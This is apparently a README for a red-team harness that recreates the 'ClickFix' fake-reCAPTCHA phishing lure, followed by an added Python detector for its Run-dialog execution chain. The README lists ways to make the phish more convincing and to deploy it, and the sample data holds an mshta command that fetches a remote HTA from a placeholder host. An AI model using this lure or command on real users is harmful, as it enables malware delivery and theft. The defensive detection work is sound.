# reCAPTCHA Phish

John Hammond | September 13, 2024


*Image: Verify You Are Human*

This is a small harness to recreate the social engineering and phishing lure seen in the wild around August/September 2024.

## 🪝 The Lure In The Wild

Originally seen under the guise of "Verify you are human", the attack vector is copy and paste.

It literally instructs the user to open the Windows Run dialog box with the Win+R hotkey and paste in, with Ctrl+V, a malicious command that the web page has preemptively copied into their clipboard.

*Image: Verification Steps*

Despite this being... dumb... sure, it probably works. 😅

Following some chatter on Twitter, these are apparently called "ClickFix", or Emmenhtal, and are used in LummaStealer campaigns observed by Unit42, Orange Cyberdefense, Huntress, and others.

Tonmoy Jitu also wrote a sweet article covering the original lure. 🔥


## 🎨 Recreation

> [!CAUTION]
> The code is bad because I am a bad programmer.

Considering the original is meant to emulate a reCAPTCHA form, I thought this "tradecraft" (if you dare to call it that) could be improved. 😈

Why not make it look as close to the real reCAPTCHA button as possible?

*Image: reCAPTCHA*

*Image: New Steps*

This repository includes some of my code playing with that idea.

Really all you need is `index.html`. It includes the CSS and JavaScript in a single file for ease of use, but it may need further customization to change the command that is run (see the JavaScript at the end of the `showVerifyWindow` function). It can be used as a standalone file to run any local command, but to get a bit more flexibility with code execution, this repository also includes a sample HTA file, `recaptcha-verify`, as an innocent proof of concept that pops open the Windows calculator application. Using this secondary HTA file means it needs to be hosted server-side, or backed by some other infrastructure that serves the payload.

For quick local testing, I literally just used `python -m http.server 8000`.

The HTA file also gives you an opportunity for a more convincing charade, potentially with a window that pops up to "try and connect to the reCAPTCHA servers", reports that it fails, and prompts the user to do it all over again. 🤪 (Extra callbacks, anybody?)

*Image: Fail to connect*

So this recreation has some extra perks:

- Looks and feels like "real" reCAPTCHA (image from the official Google site)
- Validation text in the Run box to "hide" the command (✅ "I am not a robot - reCAPTCHA Verification ID: 7624")
- Disabled "Verify" button to further encourage users to complete the copy-paste steps. 🚫
- Fleshed-out phish with the follow-up "failed to verify" window
- Clears the clipboard so the payload command is removed.

Some code is reused from https://github.com/75a/fake-captcha
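A defender-side companion to the lure described above, added here as an example and not part of this repository's code: because the chain ends with the user pasting a command into the Run dialog, the host artefacts are a script host (mshta.exe for an HTA, or a shell) spawned by explorer.exe whose command line carries the decoy comment text or a remote `.hta` URL, and the same pasted text preserved in the Run dialog's history key `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` (a standard Windows location that the README itself does not mention). The process events, the RunMRU values and the `lure.example` host are constructed for this example; the decoy string is the one the README quotes.

```python
import re
from dataclasses import dataclass

# Run-dialog launches appear as children of explorer.exe; these are the usual
# first-stage interpreters for a pasted HTA/script one-liner.
SUSPICIOUS_IMAGES = {
    "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe",
}

# Decoy comment text the lure appends so the Run box looks like a verification
# step (the README's example: 'I am not a robot - reCAPTCHA Verification ID: 7624').
DECOY_PATTERN = re.compile(r"i am not a robot|recaptcha verification", re.IGNORECASE)

# A remote .hta URL, as when the HTA payload is hosted server-side.
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)


@dataclass
class ProcessEvent:
    """Minimal process-creation record (the fields a Sysmon/EDR event would carry)."""
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_process_event(ev: ProcessEvent) -> list[str]:
    """Return the reasons this event resembles a ClickFix execution chain."""
    reasons = []
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    if parent == "explorer.exe" and image in SUSPICIOUS_IMAGES:
        reasons.append(f"{image} spawned by explorer.exe (Run dialog / shell)")
    if DECOY_PATTERN.search(ev.command_line):
        reasons.append("command line carries fake-CAPTCHA decoy text")
    if REMOTE_HTA.search(ev.command_line):
        reasons.append("command line fetches a remote .hta")
    return reasons


def is_clickfix(ev: ProcessEvent) -> bool:
    """Require two independent signals; a lone script host under explorer.exe is routine admin activity."""
    return len(score_process_event(ev)) >= 2


def scan_runmru(values: dict[str, str]) -> list[str]:
    """Flag Run-dialog history entries that contain decoy text or a remote .hta.

    Windows stores each RunMRU value as '<command>\\1' plus an 'MRUList' ordering
    value; the trailing marker is stripped before matching.
    """
    hits = []
    for name, raw in values.items():
        if name == "MRUList":
            continue
        entry = raw[:-2] if raw.endswith("\\1") else raw
        if DECOY_PATTERN.search(entry) or REMOTE_HTA.search(entry):
            hits.append(entry)
    return hits


def flagged_events(events: list[ProcessEvent]) -> list[ProcessEvent]:
    return [ev for ev in events if is_clickfix(ev)]


# --- constructed sample data (not real telemetry); lure.example is a placeholder host ---
LURE_CMD = 'mshta http://lure.example/recaptcha-verify.hta # "I am not a robot - reCAPTCHA Verification ID: 7624"'

SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe", LURE_CMD),
    ProcessEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\cmd.exe", "powershell -c Get-Date"),
]

SAMPLE_RUNMRU = {  # same shape as the values under the RunMRU key
    "a": "notepad\\1",
    "b": LURE_CMD + "\\1",
    "MRUList": "ba",
}


if __name__ == "__main__":
    for ev in flagged_events(SAMPLE_EVENTS):
        print("ALERT:", _basename(ev.image), "->", "; ".join(score_process_event(ev)))
    for entry in scan_runmru(SAMPLE_RUNMRU):
        print("RunMRU hit:", entry)
```

The two-signal threshold in `is_clickfix` is deliberate: PowerShell launched from the Run box is everyday administrator behaviour, while the decoy comment and a remote `.hta` fetch are specific to this lure, so either of those combined with the explorer.exe parent is what should page someone. The RunMRU scan is the forensic counterpart for hosts that lack process telemetry, since the pasted string survives there after the clipboard has been cleared.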


## 🤔 Other Musings

- Perhaps this could be used within an `iframe` element, or easily embedded as a widget anywhere.
- Perhaps this could have a bit more server-side control to check the client's user agent and do things differently, or adjust the payload appropriately.
- Perhaps this could be transformed into an easy GitHub Pages or Vercel tidbit to readily have a public domain and easy tooling.

Also, EdyUkAYshuNaL PoRpoiSes only!!!11 🐬